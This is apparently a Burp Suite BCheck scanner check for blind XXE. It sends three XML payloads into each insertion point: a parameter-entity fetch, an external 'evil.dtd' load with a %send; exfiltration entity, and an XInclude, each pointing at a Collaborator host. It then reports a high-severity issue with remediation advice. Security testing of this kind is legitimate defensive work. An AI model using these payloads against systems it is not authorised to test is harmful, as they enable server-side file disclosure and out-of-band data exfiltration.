metadata:
    language: v2-beta
    name: "XXE - Blind OOB Exfiltration"
    description: "Tests for blind XXE using out-of-band techniques with parameter entities"
    author: "BCheck Arsenal"
    tags: "xxe", "blind", "oob"

run for each:
    payload = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://{generate_collaborator_address()}/xxe\">%xxe;]><foo>test</foo>",
        "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % dtd SYSTEM \"http://{generate_collaborator_address()}/evil.dtd\">%dtd;%send;]><foo>test</foo>",
        "<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"http://{generate_collaborator_address()}/xinclude\"/></foo>"

given insertion point then
    send payload:
        replacing: {payload}

    if any interactions then
        report issue:
            severity: high
            confidence: certain
            detail: "Blind XXE detected. Server processed XML with external entity declarations and successfully triggered a DNS/HTTP request to the Collaborator payload."
            remediation: "Disable DTD processing entirely. Reject XML with DOCTYPE declarations."
    end if